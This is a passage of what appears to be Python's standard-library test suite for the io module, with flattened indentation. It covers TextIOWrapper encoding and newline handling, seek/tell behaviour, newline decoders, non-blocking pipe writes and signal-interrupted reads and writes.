t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
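# Each entry: [newline argument passed to TextIOWrapper, lines expected
# when reading the concatenated input back].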
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
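# Each key is the newline argument; the value is the raw bytes expected in
# the buffer after the writes below (None falls back to os.linesep's entry).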
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
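# prefix_size is chosen so that the multi-byte suffix character straddles
# a decoder chunk boundary when the file is read back.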
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check that the BOM is written only once (see issue #1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# Make sure "\r\n" straddles the 128-char chunk boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
pass
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
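# b'\xe8\xa2\x88' is the UTF-8 encoding of u'\u8888'; feeding it one byte
# at a time exercises incremental decoding across incomplete sequences.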
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
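# Feed the input one byte (or one character when encoding is None) at a
# time and check that decoder.newlines accumulates the kinds of line
# endings seen so far.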
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
self.assertRaises(ZeroDivisionError,
wio.write, item * (1024 * 1024))
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
